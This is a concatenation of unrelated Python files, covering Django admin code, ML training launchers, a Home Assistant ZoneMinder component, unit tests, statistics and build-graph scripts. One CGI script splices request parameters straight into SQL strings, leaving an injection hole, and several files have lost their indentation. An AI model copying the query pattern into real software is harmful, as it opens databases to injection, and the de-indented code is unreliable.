print "hrmThread error", e.message
self.failure_count += 1
pass
# self.checkErrorTime()
def finish(self):
try:
self.listener.stop()
except exceptions.NodeError as e:
self.showMessage("NodeError: " + e.message)
finally:
self.monitorScreen.config(text="0")
self.alive = False
def showMessage(self, msg):
self.statusMessage.config(text="Status: " + msg)
def updateScreen(self):
self.monitorScreen.config(text=self.listener.getHR())
def isAlive(self):
return self.alive
def getException(self):
return self.exception
# def checkErrorTime(self):
#
# print "error time", self.failure_count
# if self.failure_count > 10:
#
# self.showMessage("connection error, disconnected.")
# self.failure_count = 0
# self.finish()
|
from pre_exam_concert_data import student_data, with_accompaniment_costs, no_accompaniment_costs

# Running totals / constants
final_cost = 0
audience_ticket = 10

print("Pre-Exam Concerts\n")

# Collect two performers' details and append each to the shared roster.
for _ in range(2):
    entry = {
        'Performer name': input("Name of performer: "),
        'Instrument': input("What instrument are you going to play?: "),
    }
    student_data.append(entry)
    # performer_grade = int(input("Current grade (level): "))
    # audience_count = int(input("How many audience members?: "))
    # requires_accompaniment = input("Does performer need accompaniment? Type 'y' for yes or 'n' for no: ") # boolean

print(student_data)
|
from django.contrib import admin
from .models import Link, SideBar
from blog_sys.custom_site import custom_site
from blog_sys.base_admin import BaseOwnerAdmin
# Register your models here.
@admin.register(Link, site=custom_site)
class LinkAdmin(BaseOwnerAdmin):
    """Admin configuration for Link entries on the custom admin site."""
    # NOTE(review): 'creat_time' mirrors the model's (misspelled) field
    # name — renaming here alone would break the changelist.
    list_display = ('title', 'href', 'weight', 'status', 'owner', 'creat_time')
    list_display_links = ['href']
    fields = ('title', 'href', 'weight', 'status')
# Register your models here.
@admin.register(SideBar, site=custom_site)
class SideBarAdmin(BaseOwnerAdmin):
    """Admin configuration for SideBar entries on the custom admin site."""
    list_display = ('title', 'display_type', 'content', 'status', 'owner', 'creat_time')
    fields = ('title', 'display_type', 'content', 'status')
|
"""
@author: Gaetan Hadjeres
"""
from BFT.handlers import EncoderDecoderHandler
from BFT.positional_embeddings import PositionalEmbedding
import importlib
import os
import shutil
from datetime import datetime
import click
import torch
import torch.multiprocessing as mp
import torch.distributed as dist
from torch.nn.parallel import DistributedDataParallel
from BFT.getters import get_dataloader_generator, get_sos_embedding, get_source_target_data_processor, get_encoder_decoder, get_positional_embedding
@click.command()
@click.option('-t', '--train', is_flag=True)
@click.option('-l', '--load', is_flag=True)
@click.option('-o', '--overfitted', is_flag=True)
@click.option('-c', '--config', type=click.Path(exists=True))
@click.option('-n', '--num_workers', type=int, default=0)
def launcher(train, load, overfitted, config, num_workers):
    """CLI entry point: load the .py config, resolve the model directory,
    and spawn one `main` process per GPU via torch.multiprocessing.

    :param train: run training (uses every available GPU).
    :param load: resume from an existing model directory.
    :param overfitted: when loading, prefer the non-early-stopped weights.
    :param config: path to a .py file exposing a `config` dict.
    :param num_workers: dataloader workers per process.
    """
    # === Set shared parameters
    # always use the maximum number of available GPUs for training
    if train:
        world_size = torch.cuda.device_count()
        assert world_size > 0
    else:
        # only use 1 GPU for inference
        world_size = 1
    # Load config as dict: the config file is imported as a module and its
    # `config` attribute taken, so it can contain arbitrary Python.
    config_path = config
    config_module_name = os.path.splitext(config)[0].replace('/', '.')
    config = importlib.import_module(config_module_name).config
    # Compute time stamp (reused when resuming so the dir name is stable)
    if config['timestamp'] is not None:
        timestamp = config['timestamp']
    else:
        timestamp = datetime.now().strftime('%Y-%m-%d_%H:%M:%S')
        config['timestamp'] = timestamp
    # Create or retreive model_dir
    if load:
        model_dir = os.path.dirname(config_path)
    else:
        model_dir = f'models/{config["savename"]}_{timestamp}'
    # Copy .py config file in the save directory before training
    if not load:
        if not os.path.exists(model_dir):
            os.makedirs(model_dir)
        shutil.copy(config_path, f'{model_dir}/config.py')
    print(f'Using {world_size} GPUs')
    mp.spawn(main,
             args=(train, load, overfitted, config, num_workers, world_size,
                   model_dir),
             nprocs=world_size,
             join=True)
def main(rank, train, load, overfitted, config, num_workers, world_size,
         model_dir):
    """Per-GPU worker spawned by `launcher`.

    Sets up the NCCL process group, builds the encoder-decoder model from
    the config, then either trains it or loads weights and runs a
    generation/inpainting demo on one validation example.

    :param rank: this process's GPU index (also the DDP rank).
    """
    # === Init process group
    os.environ['MASTER_ADDR'] = 'localhost'
    # os.environ['MASTER_PORT'] = '12355'
    # os.environ['MASTER_PORT'] = '12356'
    # os.environ['MASTER_PORT'] = '12357'
    # hard-coded rendezvous port; change if it clashes with another job
    os.environ['MASTER_PORT'] = '12358'
    # os.environ['MASTER_PORT'] = '12359'
    dist.init_process_group(backend='nccl', world_size=world_size, rank=rank)
    torch.cuda.set_device(rank)
    device = f'cuda:{rank}'
    # === Decoder ====
    # dataloader generator
    dataloader_generator = get_dataloader_generator(
        dataset=config['dataset'],
        dataloader_generator_kwargs=config['dataloader_generator_kwargs'])
    # data processor
    data_processor = get_source_target_data_processor(
        dataloader_generator=dataloader_generator,
        data_processor_type=config['data_processor_type'],
        data_processor_kwargs=config['data_processor_kwargs'])
    # positional embedding (separate instances for source and target sides)
    positional_embedding_source: PositionalEmbedding = get_positional_embedding(
        dataloader_generator=dataloader_generator,
        positional_embedding_dict=config['positional_embedding_source_dict'])
    positional_embedding_target: PositionalEmbedding = get_positional_embedding(
        dataloader_generator=dataloader_generator,
        positional_embedding_dict=config['positional_embedding_target_dict'])
    # sos embedding
    sos_embedding = get_sos_embedding(
        dataloader_generator=dataloader_generator,
        sos_embedding_dict=config['sos_embedding_dict'])
    encoder_decoder = get_encoder_decoder(
        data_processor=data_processor,
        dataloader_generator=dataloader_generator,
        positional_embedding_source=positional_embedding_source,
        positional_embedding_target=positional_embedding_target,
        sos_embedding=sos_embedding,
        encoder_decoder_type=config['encoder_decoder_type'],
        encoder_decoder_kwargs=config['encoder_decoder_kwargs'],
        training_phase=train)
    encoder_decoder.to(device)
    encoder_decoder = DistributedDataParallel(
        module=encoder_decoder,
        device_ids=[rank],
        output_device=rank,
        # find_unused_parameters=True
    )
    handler = EncoderDecoderHandler(model=encoder_decoder,
                                    model_dir=model_dir,
                                    dataloader_generator=dataloader_generator)
    if load:
        # `overfitted` selects the last checkpoint instead of the
        # early-stopped one; recurrent weights only needed for inference
        if overfitted:
            handler.load(early_stopped=False,
                         recurrent=not train
                         )
        else:
            handler.load(early_stopped=True,
                         recurrent=not train)
    if train:
        handler.train_model(
            batch_size=config['batch_size'],
            num_batches=config['num_batches'],
            num_epochs=config['num_epochs'],
            lr=config['lr'],
            plot=True,
            num_workers=num_workers,
        )
        exit()
    # --- Inference demo: take one validation sample and inpaint a region
    (generator_train, generator_val,
     _) = dataloader_generator.dataloaders(batch_size=1,
                                           num_workers=num_workers,
                                           shuffle_val=True)
    x = next(generator_val)['x']
    _, x, _ = data_processor.preprocess(x)
    x = x.repeat(1, 1, 1)
    masked_positions = torch.zeros_like(x)
    # inpainting # But no longer needed!
    masked_positions[:, 100:150] = 1
    # masked_positions[1:, 600:700] = 1
    # masked_positions[1:, 1000:]
    # unconstrained:
    # masked_positions[1:, :] = 1
    # removes only notes
    # masked_positions[1:, :, 0:3] = 1
    # Velocifier
    # masked_positions[1:, :, 1:3] = 1
    # TEST
    metadata_dict = dict(original_sequence=x,
                         masked_positions=masked_positions)
    handler.test_decoder_with_states(
        source=x,
        metadata_dict=metadata_dict,
        temperature=1.,
        top_p=0.95
    )
    # scores = handler.inpaint(x=x,
    #                          masked_positions=masked_positions,
    #                          temperature=1.,
    #                          top_p=0.95,
    #                          top_k=0)
    # midi_file = 'inputs/br_rhap_format0.mid')
    # midi_file='/home/gaetan/Data/databases/Piano/ecomp_piano_dataset/BENABD02.mid')
    # midi_file='/home/gaetan/Data/databases/Piano/ecomp_piano_dataset/Denisova04.MID')
    # scores = decoder.generate_reharmonisation(
    #     temperature=1.0,
    #     num_reharmonisations=3,
    #     top_k=0,
    #     top_p=0.8
    # )
    # for score in scores:
    #     score.show()
    # # Body code: need do check cluster before adding values
    # start_cluster = 7
    # end_cluster = 21
    # pad_cluster = 12
    #
    # start_codes = [pad_cluster] * 5 + [start_cluster]
    # end_codes = [end_cluster] + [pad_cluster] * 5
    # body_codes = [1] * 16  # put what u want here
    # scores = decoder.generate_alla_mano(
    #     start_codes=start_codes,
    #     end_codes=end_codes,
    #     body_codes=body_codes,
    #     temperature=1.2,
    # )
    # for score in scores:
    #     score.show()
if __name__ == '__main__':
    launcher()
|
from .sign_up import SignUpForm
|
# flake8: noqa
from . import model
|
import matplotlib.pyplot as plt
import numpy as np
import torch
def plot_graph(data, labels, legends, title):
    """
    Plot multiple graphs in same plot
    :param data: data of the graphs to be plotted (list of y-series)
    :param labels: x- and y-label
    :param legends: legends for the graphs
    :param title: Title of the graph (also used as the PNG file name)
    """
    x = np.arange(1, len(data[0]) + 1)
    for to_plot in data:
        plt.plot(x, to_plot)
    plt.title(title)
    plt.xlabel(labels[0])
    plt.ylabel(labels[1])
    plt.legend(legends)
    # FIX: save BEFORE show() — on non-interactive backends show()
    # destroys the current figure, so saving afterwards wrote a blank PNG.
    plt.savefig('{}.png'.format(title))
    plt.show()
def plot_training_data(data):
    """
    Plot training data, loss over epochs.

    :param data: per-epoch rows of (training loss, validation loss).
    """
    # transpose so each column becomes one curve
    series = np.asarray(data).T
    plot_graph(series,
               ["Epoch", "Cross-entropy-loss"],
               ["Training loss", "Validation loss"],
               "Loss over epochs")
def get_device():
    """Return the CUDA device when available, otherwise the CPU device."""
    return torch.device("cuda" if torch.cuda.is_available() else "cpu")
|
"""
Support for Zoneminder.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/zoneminder/
"""
import logging
import json
from urllib.parse import urljoin
import requests
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.const import (
CONF_PATH, CONF_HOST, CONF_SSL, CONF_PASSWORD, CONF_USERNAME)
_LOGGER = logging.getLogger(__name__)
REQUIREMENTS = []
DOMAIN = 'zoneminder'
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_SSL, default=False): cv.boolean,
vol.Optional(CONF_PATH, default="/zm/"): cv.string,
vol.Optional(CONF_USERNAME): cv.string,
vol.Optional(CONF_PASSWORD): cv.string
})
}, extra=vol.ALLOW_EXTRA)
LOGIN_RETRIES = 2
ZM = {}
def setup(hass, config):
    """Set up the ZoneMinder platform from the validated HA config.

    Stores connection details in the module-level ZM dict and attempts
    an initial login; returns the login result.
    """
    global ZM
    ZM = {}
    conf = config[DOMAIN]
    scheme = "https" if conf[CONF_SSL] else "http"
    ZM['url'] = urljoin(scheme + "://" + conf[CONF_HOST], conf[CONF_PATH])
    ZM['username'] = conf.get(CONF_USERNAME, None)
    ZM['password'] = conf.get(CONF_PASSWORD, None)
    return login()
# pylint: disable=no-member
def login():
    """Login to the zoneminder api.

    Posts the stored credentials to index.php, keeps the session cookies
    in ZM['cookies'], and verifies the session with a getVersion call.
    Returns True on success, False otherwise.
    """
    _LOGGER.debug("Attempting to login to zoneminder")
    login_post = {'view': 'console', 'action': 'login'}
    if ZM['username']:
        login_post['username'] = ZM['username']
    if ZM['password']:
        login_post['password'] = ZM['password']
    req = requests.post(ZM['url'] + '/index.php', data=login_post)
    ZM['cookies'] = req.cookies
    # Login calls returns a 200 repsonse on both failure and success..
    # The only way to tell if you logged in correctly is to issue an api call.
    req = requests.get(
        ZM['url'] + 'api/host/getVersion.json',
        cookies=ZM['cookies']
    )
    if req.status_code != requests.codes.ok:
        _LOGGER.error("Connection error logging into ZoneMinder")
        return False
    return True
# pylint: disable=no-member
def get_state(api_url):
    """Get a state from the zoneminder API service.

    Retries once after re-authenticating if the session has expired.
    NOTE(review): if every retry fails, the final (failed) response body
    is still parsed and returned after logging.
    """
    # Since the API uses sessions that expire, sometimes we need
    # to re-auth if the call fails.
    for _ in range(LOGIN_RETRIES):
        req = requests.get(urljoin(ZM['url'], api_url), cookies=ZM['cookies'])
        if req.status_code != requests.codes.ok:
            login()
        else:
            break
    else:
        # loop exhausted without a successful response
        _LOGGER.exception("Unable to get API response")
    return json.loads(req.text)
# pylint: disable=no-member
def change_state(api_url, post_data):
    """Update a state using the Zoneminder API.

    Same retry/re-login pattern as get_state; returns the parsed JSON of
    the last response (even on failure, after logging).
    """
    for _ in range(LOGIN_RETRIES):
        req = requests.post(
            urljoin(ZM['url'], api_url),
            data=post_data,
            cookies=ZM['cookies'])
        if req.status_code != requests.codes.ok:
            login()
        else:
            break
    else:
        # loop exhausted without a successful response
        _LOGGER.exception("Unable to get API response")
    return json.loads(req.text)
|
# Read an integer and print its proper even divisors followed by the
# number itself, space-separated (matches the original output exactly).
n = int(input())
pieces = [str(d) for d in range(2, n, 2) if n % d == 0]
pieces.append(str(n))
print(" ".join(pieces))
|
from to_send_a_fax import E, f
import unittest
class ToSendAFaxTest(unittest.TestCase):
    """Unit tests for E (letter count of a number's English name, ignoring
    spaces/hyphens) and f(x) = 3*E(x)**3 - x."""
    def test_E(self):
        """E(n) = number of letters in n spelled out in English."""
        self.assertEqual(4, E(0))  # zero
        self.assertEqual(3, E(1))  # one
        self.assertEqual(3, E(2))  # two
        self.assertEqual(5, E(3))  # three
        self.assertEqual(4, E(4))  # four
        self.assertEqual(4, E(5))  # five
        self.assertEqual(3, E(6))  # six
        self.assertEqual(5, E(7))  # seven
        self.assertEqual(5, E(8))  # eight
        self.assertEqual(4, E(9))  # nine
        self.assertEqual(3, E(10))  # ten
        self.assertEqual(6, E(11))  # eleven
        self.assertEqual(6, E(12))  # twelve
        self.assertEqual(8, E(13))  # thirteen
        self.assertEqual(8, E(14))  # fourteen
        self.assertEqual(7, E(15))  # fifteen
        self.assertEqual(7, E(16))  # sixteen
        self.assertEqual(9, E(17))  # seventeen
        self.assertEqual(8, E(18))  # eighteen
        self.assertEqual(8, E(19))  # nineteen
        self.assertEqual(6, E(20))  # twenty
        self.assertEqual(9, E(21))  # twentyone
        self.assertEqual(6, E(30))  # thirty
        self.assertEqual(5, E(40))  # forty
        self.assertEqual(5, E(50))  # fifty
        self.assertEqual(5, E(60))  # sixty
        self.assertEqual(7, E(70))  # seventy
        self.assertEqual(6, E(80))  # eighty
        self.assertEqual(6, E(90))  # ninety
        self.assertEqual(10, E(99))  # ninetynine
        self.assertEqual(10, E(100))  # one hundred
        self.assertEqual(13, E(101))  # one hundred one
        self.assertEqual(21, E(123))  # one hundred twenty three
        self.assertEqual(21, E(999))  # nine hundred ninety nine
        # one hundred twenty three thousand four hundred fifty six
        self.assertEqual(48, E(123456))
        # nine hundred ninety nine thousand nine hundred ninety nine
        self.assertEqual(50, E(999999))
        # minus one hundred twenty three thousand four hundred fifty six
        self.assertEqual(53, E(-123456))
    def test_f(self):
        """Spot-check f against hand-computed values."""
        # f(x) = 3[E(x)]^3-x
        # f(0) = 3[E(0)]^3
        #      = 3[4]^3
        #      = 192
        self.assertEqual(192, f(0))
        # f(-123) = 3[E(-123)]^3 + 123
        #         = 3[26]^3 + 123
        #         = 52851
        self.assertEqual(52851, f(-123))
if __name__ == '__main__':
    unittest.main()
|
from django.contrib import admin
from .models import Aluno, Professor
# Expose Aluno and Professor in the Django admin with default options.
admin.site.register(Aluno)
admin.site.register(Professor)
from django import forms
from .models import question,answer
class question_form (forms.ModelForm):
    """ModelForm exposing only the question text field."""
    class Meta :
        model = question
        fields = ('question',)
class answer_form (forms.ModelForm):
    """ModelForm exposing only the answer text field."""
    class Meta :
        model = answer
        fields = ('the_answer',)
|
import pandas as pd
import matplotlib.pyplot as plt

# Wilcoxon signed-rank test on paired systolic blood pressure readings.
# The critical-value table (WSRTdf.csv) is keyed by test type, alpha, n.
TWOTAILED = 'TTT'
ONETAILED = 'OTT'
ALPHA05 = 0.05
# FIX: was 0.05 (copy-paste error); the 1% significance level is 0.01.
# selalpha still uses ALPHA05, so the script's output is unchanged.
ALPHA01 = 0.01
selalpha = ALPHA05
#selalpha = float(raw_input())
dfw = pd.read_csv("./WSRTdf.csv")
df = pd.read_csv("./SystolicBloodPressureAnalysis.csv")
number_of_samples = len(df)

# Signed ranks of the before/after differences.
df['Difference'] = df.SBP_before - df.SBP_after
df['AbsDiff'] = abs(df.Difference)
df = df.sort_values(['AbsDiff', 'Difference'])
df['Ranks'] = df['AbsDiff'].rank()
df['R+'] = df['Ranks']*(df['Difference'] > 0)
df['R-'] = df['Ranks']*(df['Difference'] < 0)
boxplot = df.boxplot(by='AbsDiff', column=['SBP_before','SBP_after'])
plt.show()

# Test statistic W is the smaller of the positive/negative rank sums.
Wplus = sum(df['R+'])
Wminus = sum(df['R-'])
W = min(Wplus, Wminus)
# selecting the matching critical value in the table
threshold = dfw[(dfw['type'] == TWOTAILED) & (dfw['alpha'] == selalpha) & (dfw['n'] == number_of_samples)]['value'].iloc[0]
# Null hypothesis is rejected when W <= critical value.
if W > threshold:
    print("Accepted")
else:
    print("Rejected")
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 2 21:55:47 2019
@author: robertwinslow
I want to have a big list of substances tagged with properties for a little doodle.
The substances are stored in an outside textfile with the following format.
[tags] Name
Tags are:
H=hot, h=cold
D=dry, d=wet
A=active, a=passive
B=bright, b=dark
L=lightweight, l=dense
U=unyielding, u=yielding (hard vs soft)
Examples:
HDABLu Fire
hdaLU Ice
This code is meant for messing with the sets using the interpreter.
"""
import itertools
#%% set up data structures and definitions
pdic = {}  #properties dictionary. maps flags/properties to sets of substances
flags = "HhDdAaBbLlUu"  #same order as names below
fullPropNames = ['hot', 'cold', 'dry', 'wet', 'active', 'passive',
                 'bright', 'dark', 'lightweight', 'dense', 'unyielding', 'yielding']
sdic = {}  #substances dictionary. Reverse of pdic. maps substance to set of flags
for i in range(len(flags)):
    #make two entries in the pdic for each property, pointing to the same set
    pdic[flags[i]] = set()
    pdic[fullPropNames[i]] = pdic[flags[i]]
    #now also map each variable name to the string, for faster typing in terminal
    #this is not best coding practices, but eh.
    # NOTE(review): exec-based binding creates module globals H='H',
    # hot='H', etc. — deliberate interpreter convenience, not for reuse.
    exec(flags[i] + "='" + flags[i] + "'" )
    exec(fullPropNames[i] + "='" + flags[i] + "'" )
#manual synonyms:
hard = unyielding
soft = yielding
subtle = lightweight
Ø = frozenset()  #just for fun.
#%% Load the current list into memory
# Each line of substances.txt is "<flag-string> <name>"; both dicts are
# populated so lookups work in either direction.
sourcefile = open("substances.txt")
txt = sourcefile.read().split('\n')
for item in txt:
    properties, name = item.split(maxsplit=1)
    sdic[name] = set()
    #put the name into the substance dictionary and vice versa
    for prop in properties:
        pdic[prop].add(name)
        sdic[name].add(prop)
sourcefile.close()
#%% Functions for manipulating and adding to the sets
def add_thing(name, *properties):
    """Register a substance under each given property flag.

    Example usage: add_thing('Potato', H, soft)
    """
    sdic.setdefault(name, set())
    for prop in properties:
        pdic[prop].add(name)
        sdic[name].add(prop)
def remove_thing(name):
    """Purge this substance from both lookup dictionaries (no-op if absent)."""
    if name not in sdic:
        return
    for prop in sdic.pop(name):
        pdic[prop].remove(name)
def find_match(*properties, quiet=False):
    """Return the set of substances that have every given property.

    `quiet` is kept for interface compatibility (printing is disabled).
    """
    return set.intersection(*(pdic[prop] for prop in properties))
def find_empty_triplets():
    """Print every property triplet (one flag from each of three distinct
    axes) that currently matches fewer than three substances."""
    axes = [fullPropNames[2 * i:2 * i + 2] for i in range(6)]
    for chosen_axes in itertools.combinations(axes, 3):
        for triplet in itertools.product(*chosen_axes):
            if len(find_match(*triplet, quiet=True)) < 3:
                print(triplet, find_match(*triplet))
find_empty_triplets()
#%% function to save file. If you don't call this, the dictionaries won't be saved.
def save_substances(filename="substances.txt"):
    """Write every substance and its property flags back to `filename`.

    Must be called explicitly — in-memory edits are not auto-saved.
    Each line is "<flag-string> <name>", matching the load format.
    """
    lines = []
    for name in sdic:
        properties = "".join(sdic[name])
        lines.append(properties + " " + name)
    # FIX: use a context manager so the file is closed even if the
    # write raises, instead of bare open()/close().
    with open(filename, 'w') as file:
        file.write("\n".join(lines))
|
import argparse
import shutil
import numpy as np
from os import makedirs
from os.path import join, exists
# Command-line interface: where to read per-token ELMo vectors, where to
# write the layer-averaged ones, and where the original dataset lives.
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', default='data/elmo',
                    help='Directory containing the dataset')
parser.add_argument('--output_dir', default='data/averaged_elmo',
                    help='Output directory')
parser.add_argument('--original_data_dir', default='data/balanced',
                    help='Directory of the original data (before conversion to ELMo suitable foramt')
def convert_dataset(data_dir, output_dir, original_data_dir):
    """Rewrite each split's sentences file with layer-averaged embeddings.

    Blank lines (sentence separators) are copied through unchanged; the
    label/metadata files are copied verbatim from *original_data_dir*.
    """
    for split in ('train', 'val', 'test'):
        split_out = join(output_dir, split)
        if not exists(split_out):
            makedirs(split_out)
        src = join(data_dir, split, 'sentences.txt')
        dst = join(split_out, 'sentences.txt')
        with open(src, 'r', encoding='utf-8') as fin, \
                open(dst, 'w', encoding='utf-8') as fout:
            for raw in fin:
                if raw == '\n':
                    fout.write('\n')
                    continue
                fields = raw.split()
                token, layers = fields[0], fields[1:]
                averaged = compute_layer_average(layers)
                fout.write(token + ' ' + ' '.join(map(str, averaged)) + '\n')
        for fname in ('noun_verb_labels.txt', 'dataset_params.json',
                      'labels_vocab.txt'):
            shutil.copyfile(join(original_data_dir, split, fname),
                            join(split_out, fname))
def compute_layer_average(elmo_layers):
    """Average the three concatenated ELMo layer vectors into one embedding.

    *elmo_layers* is a flat sequence of 3*d numbers (strings or floats);
    returns a float32 array of length d.
    """
    stacked = np.asarray(elmo_layers, dtype='float32').reshape(3, -1)
    return stacked.mean(axis=0)
if __name__ == '__main__':
    # Resolve CLI arguments and run the conversion end to end.
    args = parser.parse_args()
    path_dataset = args.data_dir
    output_dir = args.output_dir
    original_data_dir = args.original_data_dir
    convert_dataset(path_dataset, output_dir, original_data_dir)
class Employee:
    """Minimal employee record with a salary-raise operation."""

    def __init__(self, fname, lname, salary):
        """Store the employee's name parts and starting salary."""
        self.first_name = fname
        self.last_name = lname
        self.salary = salary

    def give_raise(self, amount=5000):
        """Increase salary by *amount*; defaults to a $5000 raise."""
        self.salary += amount
#!/usr/bin/env python3
import argparse
import itertools
import os
import posixpath
import re
try:
import cPickle as pickle # Python 2
except ImportError:
import pickle # Python 3
import ninja
def _parse_args():
parser = argparse.ArgumentParser()
# Ninja input file options
parser.add_argument('input_file', help='input ninja file')
parser.add_argument('--ninja-deps', help='.ninja_deps file')
parser.add_argument('--cwd', help='working directory for ninja')
parser.add_argument('--encoding', default='utf-8',
help='ninja file encoding')
# Options
parser.add_argument(
'--out-dir', default='out', help='path to output directory')
parser.add_argument(
'--installed-filter', default='system',
help='path filter for installed files (w.r.t. device root)')
parser.add_argument(
'--source-filter', default='vendor:device',
help='path filter for source files (w.r.t. source root)')
return parser.parse_args()
def main():
    """Print installed files that (transitively) come from vendor sources.

    Walks the ninja build graph: a file is "from vendor" if any transitive
    input matches --source-filter; only outputs under the installed-filter
    product directories are reported.
    """
    args = _parse_args()

    out_dir = posixpath.normpath(args.out_dir)
    out_pattern = re.compile(re.escape(out_dir) + '/')

    installed_dirs = '|'.join('(?:' + re.escape(posixpath.normpath(path)) + ')'
                              for path in args.installed_filter.split(':'))
    installed_filter = re.compile(
        re.escape(out_dir) + '/target/product/[^/]+/' +
        '(?:' + installed_dirs + ')')

    source_filter = re.compile(
        '|'.join('(?:' + re.escape(posixpath.normpath(path)) + ')'
                 for path in args.source_filter.split(':')))

    manifest = ninja.load_manifest_from_args(args)

    # Build lookup map: output path -> build edge that produces it.
    outs = {}
    for build in manifest.builds:
        for path in build.explicit_outs:
            outs[path] = build
        for path in build.implicit_outs:
            outs[path] = build

    # Memoization for the transitive "is from vendor" query.
    outs_from_vendor_cache = {}

    def _are_inputs_from_vendor(build):
        # Check whether the input files are matched by source_filter first.
        gen_paths = []
        paths = itertools.chain(
            build.explicit_ins, build.implicit_ins, build.depfile_implicit_ins)
        for path in paths:
            if source_filter.match(path):
                return True
            if out_pattern.match(path):
                gen_paths.append(path)
        # Check whether the input files transitively depend on source_filter.
        for path in gen_paths:
            if is_from_vendor(path):
                return True
        return False

    def is_from_vendor(out_path):
        matched = outs_from_vendor_cache.get(out_path, None)
        if matched is not None:
            return matched
        build = outs.get(out_path)
        if build:
            matched = _are_inputs_from_vendor(build)
        else:
            # BUG FIX: this previously tested the stale loop variable `path`
            # from main's scope; the path being queried is `out_path`.
            matched = bool(source_filter.match(out_path))
        outs_from_vendor_cache[out_path] = matched
        return matched

    matched_paths = [
        path for path in outs
        if installed_filter.match(path) and is_from_vendor(path)]
    matched_paths.sort()

    for path in matched_paths:
        print(path)
if __name__ == '__main__':
    # Script entry point.
    main()
|
import torch
from braindecode import EEGClassifier
from braindecode.models import ShallowFBCSPNet
from sklearn.pipeline import Pipeline
from skorch.callbacks import EarlyStopping, EpochScoring
from skorch.dataset import ValidSplit

from moabb.pipelines.features import Resampler_Epoch
from moabb.pipelines.utils_pytorch import BraindecodeDatasetLoader, InputShapeSetterEEG

# Set up GPU if it is there
cuda = torch.cuda.is_available()
device = "cuda" if cuda else "cpu"

# Training hyperparameters for the skorch/braindecode classifier.
LEARNING_RATE = 0.0001
WEIGHT_DECAY = 0  # NOTE(review): defined but never passed to the optimizer -- confirm intent
BATCH_SIZE = 64
SEED = 42
VERBOSE = 1
EPOCH = 5
PATIENCE = 3

# Adapter that turns MOABB epochs into braindecode-compatible datasets.
create_dataset = BraindecodeDatasetLoader()

# Placeholder model shape; InputShapeSetterEEG below resizes it to the real
# data shape when fit() is called.
model = ShallowFBCSPNet(
    in_chans=1, n_classes=2, input_window_samples=100, final_conv_length="auto"
)

# Define a Skorch classifier
clf = EEGClassifier(
    module=model,
    criterion=torch.nn.CrossEntropyLoss,
    optimizer=torch.optim.Adam,
    optimizer__lr=LEARNING_RATE,
    batch_size=BATCH_SIZE,
    max_epochs=EPOCH,
    train_split=ValidSplit(0.2, random_state=SEED),
    device=device,
    callbacks=[
        EarlyStopping(monitor="valid_loss", patience=PATIENCE),
        EpochScoring(
            scoring="accuracy", on_train=True, name="train_acc", lower_is_better=False
        ),
        EpochScoring(
            scoring="accuracy", on_train=False, name="valid_acc", lower_is_better=False
        ),
        InputShapeSetterEEG(
            params_list=["in_chans", "input_window_samples", "n_classes"],
        ),
    ],
    verbose=VERBOSE,  # VERBOSE=1 prints per-epoch results
)

# Create the pipelines
pipes = Pipeline(
    [
        ("resample", Resampler_Epoch(250)),
        ("braindecode_dataset", create_dataset),
        ("ShallowFBCSPNet", clf),
    ]
)

# this is what will be loaded
PIPELINE = {
    "name": "braindecode_ShallowFBCSPNet",
    "paradigms": ["LeftRightImagery", "MotorImagery"],
    "pipeline": pipes,
}
|
#!/usr/bin/python
## -*- coding: utf-8 -*-
#
import json
#import db_conf
import cgi
import sys
import sqlite3
conn = sqlite3.connect('sqlite/hemap_core3.db')
conn.text_factory = str
c = conn.cursor()
qform = cgi.FieldStorage()
inparam = "CML"#
inparam = "GSM219392 GSM219393 GSM219394"
inparam = qform.getvalue('inparameter')
incol = "lineage_tumor_cat"#
incol = qform.getvalue('column')
#incol = "gsms"
mapsource = "hema_gsm_cluster"
if (qform.getvalue('mapsource') != None and qform.getvalue('mapsource') == "leukemia"):
mapsource = "hema_gsm_cluster_leukemia";
"""
gsm text, gse text, main_cat text, lineage_tumor_cat text, subtype_cat text, spec_cat text, cytogenetics text, clinical text, submaps text, patient text, sample_source text, sample_isolation text, notes text
"""
#select = "select " + outcols + " from hema_annotationf where " + incol + " like '%" + inparam + "%' order by gsm asc"
select = "select pt, hc.gsm from hema_annotationf ha, " + mapsource + " hc where ha.gsm = hc.gsm and " + incol + " like '%" + inparam + "%'"
if (incol == "gsms"):
ingsm = ""
for p in inparam.split(" "):
p = p.replace(" ", "")
ingsm = ingsm + "'" + p + "',"
ingsm = ingsm[:-1]
select = "select pt, hc.gsm from hema_annotationf ha, " + mapsource + " hc where ha.gsm = hc.gsm and hc.gsm in (" + ingsm + ") order by hc.gsm asc"
#c.execute("select " + outcols + " from hema_annotationf where " + incol + " like '%" + inparam + "%' order by gsm asc")
c.execute(select)
#c.execute("select pt, hc.gsm from hema_annotationf ha, " + mapsource + " hc where ha.gsm = hc.gsm and " + incol + " like '%" + inparam + "%'")
rows = c.fetchall()
print "Content-type: text/html;charset=utf-8\r\n"
pa = {}
pa['espts'] = []
pa['esgsms'] = {}
for row in rows:
pi = []
for r in range(len(row)):
col = row[r]
if (col == None):
col = ""
col = col.replace("'", "")
if (r == 0):
#"<a href=javascript:updateExperiment('" + str(row[r]) + "')>edit</a>")
pi.append(float(col.split(",")[0]))
pi.append(float(col.split(",")[1]))
#pi.append("<a href='javascript:highlightGSM(\"" + col + "\")'>" + col + "</a>")
else:
pa['esgsms'][col] = pi
pa['espts'].append(pi)
c.close()
print json.dumps(pa)
|
# Print the first N Fibonacci numbers, where N is read from stdin.
terms = int(input("number of terms you want?"))
previous, current = 0, 1
if terms <= 0:
    print("enter positive number")
elif terms == 1:
    print("fibonacci series up to:", terms, ":")
    print(previous)
else:
    print("fibonacci series:")
    for _ in range(terms):
        print(previous)
        previous, current = current, previous + current
|
def print_welcome_message():
    """Describe what the PDA simulator does."""
    banner = (
        "This program is a Push-Down Automata (PDA) string simulator.",
        "Given a PDA provided as a JSON file under files/, it will generate its transition table.",
        "With this transition table, it will then loop through the provided strings and print whether it is accepted or rejected.",
    )
    for line in banner:
        print(line)
def print_menu():
    """List the numbered actions the user can choose from."""
    options = (
        "1. Loop through strings in JSON file",
        "2. Enter in string manually",
        "3. Print PDA transition table",
        "4. Move to next file in files/ directory.",
        "5. Exit program",
    )
    print("Actions:")
    for option in options:
        print(option)
def print_transition_table_info(filename):
